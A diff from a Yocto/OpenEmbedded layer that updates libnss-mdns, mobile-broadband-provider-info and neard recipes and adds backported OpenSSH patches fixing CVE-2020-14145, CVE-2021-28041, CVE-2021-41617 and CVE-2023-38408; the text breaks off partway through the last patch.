diff --git a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
index 5e4460045b..5213b28345 100644
--- a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
+++ b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Name Service Switch module for Multicast DNS (zeroconf) name resolution"
 HOMEPAGE = "https://github.com/lathiat/nss-mdns"
+DESCRIPTION = "nss-mdns is a plugin for the GNU Name Service Switch (NSS) functionality of the GNU C Library (glibc) providing host name resolution via Multicast DNS (aka Zeroconf, aka Apple Rendezvous, aka Apple Bonjour), effectively allowing name resolution by common Unix/Linux programs in the ad-hoc mDNS domain .local."
 SECTION = "libs"
 
 LICENSE = "LGPLv2.1+"
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1"
 
 DEPENDS = "avahi"
 
-SRC_URI = "git://github.com/lathiat/nss-mdns \
+SRC_URI = "git://github.com/lathiat/nss-mdns;branch=master;protocol=https \
            "
 
 SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae"
diff --git a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
index 0b0bbab168..a4030b7b32 100644
--- a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
+++ b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
@@ -1,13 +1,15 @@
 SUMMARY = "Mobile Broadband Service Provider Database"
 HOMEPAGE = "http://live.gnome.org/NetworkManager/MobileBroadband/ServiceProviders"
+DESCRIPTION = "Mobile Broadband Service Provider Database stores service provider specific information. When this Database is available the information can be fetched there"
 SECTION = "network"
 LICENSE = "PD"
 LIC_FILES_CHKSUM = "file://COPYING;md5=87964579b2a8ece4bc6744d2dc9a8b04"
-SRCREV = "22b49d86fb7aded2c195a9d49e5924da696b3228"
-PV = "20190618"
+
+SRCREV = "aae7c68671d225e6d35224613d5b98192b9b2ffe"
+PV = "20230416"
 PE = "1"
 
-SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https"
+SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https;branch=main"
 S = "${WORKDIR}/git"
 
 inherit autotools
diff --git a/meta/recipes-connectivity/neard/neard_0.16.bb b/meta/recipes-connectivity/neard/neard_0.16.bb
index 7c124a3c0b..dd0742f792 100644
--- a/meta/recipes-connectivity/neard/neard_0.16.bb
+++ b/meta/recipes-connectivity/neard/neard_0.16.bb
@@ -2,21 +2,22 @@ SUMMARY = "Linux NFC daemon"
 DESCRIPTION = "A daemon for the Linux Near Field Communication stack"
 HOMEPAGE = "http://01.org/linux-nfc"
 LICENSE = "GPLv2"
+LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
+                    file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
+                   "
 
 DEPENDS = "dbus glib-2.0 libnl"
 
-SRC_URI = "${KERNELORG_MIRROR}/linux/network/nfc/${BP}.tar.xz \
+SRC_URI = "git://git.kernel.org/pub/scm/network/nfc/neard.git;protocol=git;branch=master \
            file://neard.in \
            file://Makefile.am-fix-parallel-issue.patch \
            file://Makefile.am-do-not-ship-version.h.patch \
            file://0001-Add-header-dependency-to-nciattach.o.patch \
           "
-SRC_URI[md5sum] = "5c691fb7872856dc0d909c298bc8cb41"
-SRC_URI[sha256sum] = "eae3b11c541a988ec11ca94b7deab01080cd5b58cfef3ced6ceac9b6e6e65b36"
 
-LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
- file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
- "
+SRCREV = "949795024f7625420e93e288c56e194cb9a3e74a"
+
+S = "${WORKDIR}/git"
 
 inherit autotools pkgconfig systemd update-rc.d
 
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
new file mode 100644
index 0000000000..3adb981fb4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
@@ -0,0 +1,97 @@
+From b3855ff053f5078ec3d3c653cdaedefaa5fc362d Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 18 Sep 2020 05:23:03 +0000
+Subject: upstream: tweak the client hostkey preference ordering algorithm to
+
+prefer the default ordering if the user has a key that matches the
+best-preference default algorithm.
+
+feedback and ok markus@
+
+OpenBSD-Commit-ID: a92dd7d7520ddd95c0a16786a7519e6d0167d35f
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+---
+ sshconnect2.c | 41 ++++++++++++++++++++++++++++++++++++++---
+ 1 file changed, 38 insertions(+), 3 deletions(-)
+
+CVE: CVE-2020-14145
+Upstream-Status: Backport [https://anongit.mindrot.org/openssh.git/patch/?id=b3855ff053f5078ec3d3c653cdaedefaa5fc362d]
+Comment: Refreshed first hunk
+
+diff --git a/sshconnect2.c b/sshconnect2.c
+index 347e348c..f64aae66 100644
+--- a/sshconnect2.c
++++ b/sshconnect2.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: sshconnect2.c,v 1.320 2020/02/06 22:48:23 djm Exp $ */
++/* $OpenBSD: sshconnect2.c,v 1.326 2020/09/18 05:23:03 djm Exp $ */
+ /*
+  * Copyright (c) 2000 Markus Friedl.  All rights reserved.
+  * Copyright (c) 2008 Damien Miller.  All rights reserved.
+@@ -102,12 +102,25 @@ verify_host_key_callback(struct sshkey *hostkey, struct ssh *ssh)
+ 	return 0;
+ }
+ 
++/* Returns the first item from a comma-separated algorithm list */
++static char *
++first_alg(const char *algs)
++{
++	char *ret, *cp;
++
++	ret = xstrdup(algs);
++	if ((cp = strchr(ret, ',')) != NULL)
++		*cp = '\0';
++	return ret;
++}
++
+ static char *
+ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ {
+-	char *oavail, *avail, *first, *last, *alg, *hostname, *ret;
++	char *oavail = NULL, *avail = NULL, *first = NULL, *last = NULL;
++	char *alg = NULL, *hostname = NULL, *ret = NULL, *best = NULL;
+ 	size_t maxlen;
+-	struct hostkeys *hostkeys;
++	struct hostkeys *hostkeys = NULL;
+ 	int ktype;
+ 	u_int i;
+ 
+@@ -119,6 +132,26 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ 	for (i = 0; i < options.num_system_hostfiles; i++)
+ 		load_hostkeys(hostkeys, hostname, options.system_hostfiles[i]);
+ 
++	/*
++	 * If a plain public key exists that matches the type of the best
++	 * preference HostkeyAlgorithms, then use the whole list as is.
++	 * Note that we ignore whether the best preference algorithm is a
++	 * certificate type, as sshconnect.c will downgrade certs to
++	 * plain keys if necessary.
++	 */
++	best = first_alg(options.hostkeyalgorithms);
++	if (lookup_key_in_hostkeys_by_type(hostkeys,
++	    sshkey_type_plain(sshkey_type_from_name(best)), NULL)) {
++		debug3("%s: have matching best-preference key type %s, "
++		    "using HostkeyAlgorithms verbatim", __func__, best);
++		ret = xstrdup(options.hostkeyalgorithms);
++		goto out;
++	}
++
++	/*
++	 * Otherwise, prefer the host key algorithms that match known keys
++	 * while keeping the ordering of HostkeyAlgorithms as much as possible.
++	 */
+ 	oavail = avail = xstrdup(options.hostkeyalgorithms);
+ 	maxlen = strlen(avail) + 1;
+ 	first = xmalloc(maxlen);
+@@ -159,6 +192,8 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ 	if (*first != '\0')
+ 		debug3("%s: prefer hostkeyalgs: %s", __func__, first);
+ 
++ out:
++	free(best);
+ 	free(first);
+ 	free(last);
+ 	free(hostname);
+-- 
+cgit v1.2.3
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
new file mode 100644
index 0000000000..9fd7e932d1
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
@@ -0,0 +1,20 @@
+Description: fix double-free memory corruption in ssh-agent
+Author: Marc Deslauriers <marc.deslauriers@canonical.com>
+Origin: minimal fix for https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+
+CVE: CVE-2021-28041
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_8.2p1-4ubuntu0.3.debian.tar.xz]
+Comment: No change in any hunk
+
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -496,6 +496,7 @@ process_add_identity(SocketEntry *e)
+				goto err;
+			}
+			free(ext_name);
++			ext_name = NULL;
+			break;
+		default:
+			error("%s: Unknown constraint %d", __func__, ctype);
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
new file mode 100644
index 0000000000..bda896f581
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
@@ -0,0 +1,52 @@
+From a6414400ec94a17871081f7df24f910a6ee01b8b Mon Sep 17 00:00:00 2001
+From: Ali Abdallah <aabdallah@suse.de>
+Date: Wed, 24 Nov 2021 13:33:39 +0100
+Subject: [PATCH] CVE-2021-41617 fix
+
+backport of the following two upstream commits
+
+f3cbe43e28fe71427d41cfe3a17125b972710455
+bf944e3794eff5413f2df1ef37cddf96918c6bde
+
+CVE-2021-41617 failed to correctly initialise supplemental groups
+when executing an AuthorizedKeysCommand or AuthorizedPrincipalsCommand,
+where a AuthorizedKeysCommandUser or AuthorizedPrincipalsCommandUser
+directive has been set to run the command as a different user. Instead
+these commands would inherit the groups that sshd(8) was started with.
+---
+ auth.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+CVE: CVE-2021-41617
+Upstream-Status: Backport [https://bugzilla.suse.com/attachment.cgi?id=854015]
+Comment: No change in any hunk
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/auth.c b/auth.c
+index 163038f..a47b267 100644
+--- a/auth.c
++++ b/auth.c
+@@ -52,6 +52,7 @@
+ #include <limits.h>
+ #include <netdb.h>
+ #include <time.h>
++#include <grp.h>
+ 
+ #include "xmalloc.h"
+ #include "match.h"
+@@ -851,6 +852,13 @@ subprocess(const char *tag, struct passwd *pw, const char *command,
+ 		}
+ 		closefrom(STDERR_FILENO + 1);
+ 
++		if (geteuid() == 0 &&
++		    initgroups(pw->pw_name, pw->pw_gid) == -1) {
++			error("%s: initgroups(%s, %u): %s", tag,
++			    pw->pw_name, (u_int)pw->pw_gid, strerror(errno));
++			_exit(1);
++		}
++
+ 		/* Don't use permanently_set_uid() here to avoid fatal() */
+ 		if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) {
+ 			error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid,
+-- 
+2.26.2
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
new file mode 100644
index 0000000000..c899056337
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
@@ -0,0 +1,189 @@
+From f6213e03887237714eb5bcfc9089c707069f87c5 Mon Sep 17 00:00:00 2001
+From: Damien Miller <djm@mindrot.org>
+Date: Fri, 1 Oct 2021 16:35:49 +1000
+Subject: [PATCH 01/12] make OPENSSL_HAS_ECC checks more thorough
+
+ok dtucker
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/dee22129bbc61e25b1003adfa2bc584c5406ef2d]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11-client.c | 16 ++++++++--------
+ ssh-pkcs11.c        | 26 +++++++++++++-------------
+ 2 files changed, 21 insertions(+), 21 deletions(-)
+
+diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
+index 8a0ffef..41114c7 100644
+--- a/ssh-pkcs11-client.c
++++ b/ssh-pkcs11-client.c
+@@ -163,7 +163,7 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+	return (ret);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+     const BIGNUM *rp, EC_KEY *ec)
+@@ -220,12 +220,12 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+	sshbuf_free(msg);
+	return (ret);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ static RSA_METHOD	*helper_rsa;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static EC_KEY_METHOD	*helper_ecdsa;
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* redirect private key crypto operations to the ssh-pkcs11-helper */
+ static void
+@@ -233,10 +233,10 @@ wrap_key(struct sshkey *k)
+ {
+	if (k->type == KEY_RSA)
+		RSA_set_method(k->rsa, helper_rsa);
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+	else if (k->type == KEY_ECDSA)
+		EC_KEY_set_method(k->ecdsa, helper_ecdsa);
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+	else
+		fatal("%s: unknown key type", __func__);
+ }
+@@ -247,7 +247,7 @@ pkcs11_start_helper_methods(void)
+	if (helper_rsa != NULL)
+		return (0);
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+	int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
+	    unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
+	if (helper_ecdsa != NULL)
+@@ -257,7 +257,7 @@ pkcs11_start_helper_methods(void)
+		return (-1);
+	EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
+	EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+	if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
+		fatal("%s: RSA_meth_dup failed", __func__);
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index a302c79..b56a41b 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -78,7 +78,7 @@ struct pkcs11_key {
+
+ int pkcs11_interactive = 0;
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static void
+ ossl_error(const char *msg)
+ {
+@@ -89,7 +89,7 @@ ossl_error(const char *msg)
+		error("%s: libcrypto error: %.100s", __func__,
+		    ERR_error_string(e, NULL));
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ int
+ pkcs11_init(int interactive)
+@@ -190,10 +190,10 @@ pkcs11_del_provider(char *provider_id)
+
+ static RSA_METHOD *rsa_method;
+ static int rsa_idx = 0;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static EC_KEY_METHOD *ec_key_method;
+ static int ec_key_idx = 0;
+-#endif
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* release a wrapped object */
+ static void
+@@ -492,7 +492,7 @@ pkcs11_rsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
+	return (0);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ /* openssl callback doing the actual signing operation */
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+@@ -604,7 +604,7 @@ pkcs11_ecdsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
+
+	return (0);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* remove trailing spaces */
+ static void
+@@ -679,7 +679,7 @@ pkcs11_key_included(struct sshkey ***keysp, int *nkeys, struct sshkey *key)
+	return (0);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static struct sshkey *
+ pkcs11_fetch_ecdsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+     CK_OBJECT_HANDLE *obj)
+@@ -802,7 +802,7 @@ fail:
+
+	return (key);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ static struct sshkey *
+ pkcs11_fetch_rsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+@@ -910,7 +910,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ #endif
+	struct sshkey		*key = NULL;
+	int			 i;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+	int			 nid;
+ #endif
+	const u_char		*cp;
+@@ -999,7 +999,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+		key->type = KEY_RSA;
+		key->flags |= SSHKEY_FLAG_EXT;
+		rsa = NULL;	/* now owned by key */
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+	} else if (EVP_PKEY_base_id(evp) == EVP_PKEY_EC) {
+		if (EVP_PKEY_get0_EC_KEY(evp) == NULL) {
+			error("invalid x509; no ec key");
+@@ -1030,7 +1030,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+		key->type = KEY_ECDSA;
+		key->flags |= SSHKEY_FLAG_EXT;
+		ec = NULL;	/* now owned by key */
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+	} else {
+		error("unknown certificate key type");
+		goto out;
+@@ -1237,11 +1237,11 @@ pkcs11_fetch_keys(struct pkcs11_provider *p, CK_ULONG slotidx,
+		case CKK_RSA:
+			key = pkcs11_fetch_rsa_pubkey(p, slotidx, &obj);
+			break;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+		case CKK_ECDSA:
+			key = pkcs11_fetch_ecdsa_pubkey(p, slotidx, &obj);
+			break;
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+		default:
+			/* XXX print key type? */
+			key = NULL;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
new file mode 100644
index 0000000000..25ba921869
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
@@ -0,0 +1,581 @@
+From 92cebfbcc221c9ef3f6bbb78da3d7699c0ae56be Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 14:03:45 +0000
+Subject: [PATCH 02/12] upstream: Separate ssh-pkcs11-helpers for each p11
+ module
+
+Make ssh-pkcs11-client start an independent helper for each provider,
+providing better isolation between modules and reliability if a single
+module misbehaves.
+
+This also implements reference counting of PKCS#11-hosted keys,
+allowing ssh-pkcs11-helper subprocesses to be automatically reaped
+when no remaining keys reference them. This fixes some bugs we have
+that make PKCS11 keys unusable after they have been deleted, e.g.
+https://bugzilla.mindrot.org/show_bug.cgi?id=3125
+
+ok markus@
+
+OpenBSD-Commit-ID: 0ce188b14fe271ab0568f4500070d96c5657244e
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/099cdf59ce1e72f55d421c8445bf6321b3004755]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11-client.c | 372 +++++++++++++++++++++++++++++++++-----------
+ 1 file changed, 282 insertions(+), 90 deletions(-)
+
+diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
+index 41114c7..4f3c6ed 100644
+--- a/ssh-pkcs11-client.c
++++ b/ssh-pkcs11-client.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-pkcs11-client.c,v 1.16 2020/01/25 00:03:36 djm Exp $ */
++/* $OpenBSD: ssh-pkcs11-client.c,v 1.18 2023/07/19 14:03:45 djm Exp $ */
+ /*
+  * Copyright (c) 2010 Markus Friedl.  All rights reserved.
+  * Copyright (c) 2014 Pedro Martelletto. All rights reserved.
+@@ -30,12 +30,11 @@
+ #include <string.h>
+ #include <unistd.h>
+ #include <errno.h>
++#include <limits.h>
+
+ #include <openssl/ecdsa.h>
+ #include <openssl/rsa.h>
+
+-#include "openbsd-compat/openssl-compat.h"
+-
+ #include "pathnames.h"
+ #include "xmalloc.h"
+ #include "sshbuf.h"
+@@ -47,18 +46,140 @@
+ #include "ssh-pkcs11.h"
+ #include "ssherr.h"
+
++#include "openbsd-compat/openssl-compat.h"
++
+ /* borrows code from sftp-server and ssh-agent */
+
+-static int fd = -1;
+-static pid_t pid = -1;
++/*
++ * Maintain a list of ssh-pkcs11-helper subprocesses. These may be looked up
++ * by provider path or their unique EC/RSA METHOD pointers.
++ */
++struct helper {
++	char *path;
++	pid_t pid;
++	int fd;
++	RSA_METHOD *rsa_meth;
++	EC_KEY_METHOD *ec_meth;
++	int (*rsa_finish)(RSA *rsa);
++	void (*ec_finish)(EC_KEY *key);
++	size_t nrsa, nec; /* number of active keys of each type */
++};
++static struct helper **helpers;
++static size_t nhelpers;
++
++static struct helper *
++helper_by_provider(const char *path)
++{
++	size_t i;
++
++	for (i = 0; i < nhelpers; i++) {
++		if (helpers[i] == NULL || helpers[i]->path == NULL ||
++		    helpers[i]->fd == -1)
++			continue;
++		if (strcmp(helpers[i]->path, path) == 0)
++			return helpers[i];
++	}
++	return NULL;
++}
++
++static struct helper *
++helper_by_rsa(const RSA *rsa)
++{
++	size_t i;
++	const RSA_METHOD *meth;
++
++	if ((meth = RSA_get_method(rsa)) == NULL)
++		return NULL;
++	for (i = 0; i < nhelpers; i++) {
++		if (helpers[i] != NULL && helpers[i]->rsa_meth == meth)
++			return helpers[i];
++	}
++	return NULL;
++
++}
++
++static struct helper *
++helper_by_ec(const EC_KEY *ec)
++{
++	size_t i;
++	const EC_KEY_METHOD *meth;
++
++	if ((meth = EC_KEY_get_method(ec)) == NULL)
++		return NULL;
++	for (i = 0; i < nhelpers; i++) {
++		if (helpers[i] != NULL && helpers[i]->ec_meth == meth)
++			return helpers[i];
++	}
++	return NULL;
++
++}
++
++static void
++helper_free(struct helper *helper)
++{
++	size_t i;
++	int found = 0;
++
++	if (helper == NULL)
++		return;
++	if (helper->path == NULL || helper->ec_meth == NULL ||
++	    helper->rsa_meth == NULL)
++		fatal("%s: inconsistent helper", __func__);
++	debug3("%s: free helper for provider %s", __func__ , helper->path);
++	for (i = 0; i < nhelpers; i++) {
++		if (helpers[i] == helper) {
++			if (found)
++				fatal("%s: helper recorded more than once", __func__);
++			found = 1;
++		}
++		else if (found)
++			helpers[i - 1] = helpers[i];
++	}
++	if (found) {
++		helpers = xrecallocarray(helpers, nhelpers,
++		    nhelpers - 1, sizeof(*helpers));
++		nhelpers--;
++	}
++	free(helper->path);
++	EC_KEY_METHOD_free(helper->ec_meth);
++	RSA_meth_free(helper->rsa_meth);
++	free(helper);
++}
++
++static void
++helper_terminate(struct helper *helper)
++{
++	if (helper == NULL) {
++		return;
++	} else if (helper->fd == -1) {
++		debug3("%s: already terminated", __func__);
++	} else {
++		debug3("terminating helper for %s; "
++		    "remaining %zu RSA %zu ECDSA", __func__,
++		    helper->path, helper->nrsa, helper->nec);
++		close(helper->fd);
++		/* XXX waitpid() */
++		helper->fd = -1;
++		helper->pid = -1;
++	}
++	/*
++	 * Don't delete the helper entry until there are no remaining keys
++	 * that reference it. Otherwise, any signing operation would call
++	 * a free'd METHOD pointer and that would be bad.
++	 */
++	if (helper->nrsa == 0 && helper->nec == 0)
++		helper_free(helper);
++}
+
+ static void
+-send_msg(struct sshbuf *m)
++send_msg(int fd, struct sshbuf *m)
+ {
+	u_char buf[4];
+	size_t mlen = sshbuf_len(m);
+	int r;
+
++	if (fd == -1)
++		return;
+	POKE_U32(buf, mlen);
+	if (atomicio(vwrite, fd, buf, 4) != 4 ||
+	    atomicio(vwrite, fd, sshbuf_mutable_ptr(m),
+@@ -69,12 +190,15 @@ send_msg(struct sshbuf *m)
+ }
+
+ static int
+-recv_msg(struct sshbuf *m)
++recv_msg(int fd, struct sshbuf *m)
+ {
+	u_int l, len;
+	u_char c, buf[1024];
+	int r;
+
++	sshbuf_reset(m);
++	if (fd == -1)
++		return 0; /* XXX */
+	if ((len = atomicio(read, fd, buf, 4)) != 4) {
+		error("read from helper failed: %u", len);
+		return (0); /* XXX */
+@@ -83,7 +207,6 @@ recv_msg(struct sshbuf *m)
+	if (len > 256 * 1024)
+		fatal("response too long: %u", len);
+	/* read len bytes into m */
+-	sshbuf_reset(m);
+	while (len > 0) {
+		l = len;
+		if (l > sizeof(buf))
+@@ -104,14 +227,17 @@ recv_msg(struct sshbuf *m)
+ int
+ pkcs11_init(int interactive)
+ {
+-	return (0);
++	return 0;
+ }
+
+ void
+ pkcs11_terminate(void)
+ {
+-	if (fd >= 0)
+-		close(fd);
++	size_t i;
++
++	debug3("%s: terminating %zu helpers", __func__, nhelpers);
++	for (i = 0; i < nhelpers; i++)
++		helper_terminate(helpers[i]);
+ }
+
+ static int
+@@ -122,7 +248,11 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+	u_char *blob = NULL, *signature = NULL;
+	size_t blen, slen = 0;
+	int r, ret = -1;
++	struct helper *helper;
+
++	if ((helper = helper_by_rsa(rsa)) == NULL || helper->fd == -1)
++		fatal("%s: no helper for PKCS11 key", __func__);
++	debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
+	if (padding != RSA_PKCS1_PADDING)
+		goto fail;
+	key = sshkey_new(KEY_UNSPEC);
+@@ -144,10 +274,10 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+	    (r = sshbuf_put_string(msg, from, flen)) != 0 ||
+	    (r = sshbuf_put_u32(msg, 0)) != 0)
+		fatal("%s: buffer error: %s", __func__, ssh_err(r));
+-	send_msg(msg);
++	send_msg(helper->fd, msg);
+	sshbuf_reset(msg);
+
+-	if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
++	if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
+		if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
+			fatal("%s: buffer error: %s", __func__, ssh_err(r));
+		if (slen <= (size_t)RSA_size(rsa)) {
+@@ -163,7 +293,26 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+	return (ret);
+ }
+
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
++static int
++rsa_finish(RSA *rsa)
++{
++	struct helper *helper;
++
++	if ((helper = helper_by_rsa(rsa)) == NULL)
++		fatal("%s: no helper for PKCS11 key", __func__);
++	debug3("%s: free PKCS11 RSA key for provider %s", __func__, helper->path);
++	if (helper->rsa_finish != NULL)
++		helper->rsa_finish(rsa);
++	if (helper->nrsa == 0)
++		fatal("%s: RSA refcount error", __func__);
++	helper->nrsa--;
++	debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++	    helper->path, helper->nrsa, helper->nec);
++	if (helper->nrsa == 0 && helper->nec == 0)
++		helper_terminate(helper);
++	return 1;
++}
++
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+     const BIGNUM *rp, EC_KEY *ec)
+@@ -175,7 +324,11 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
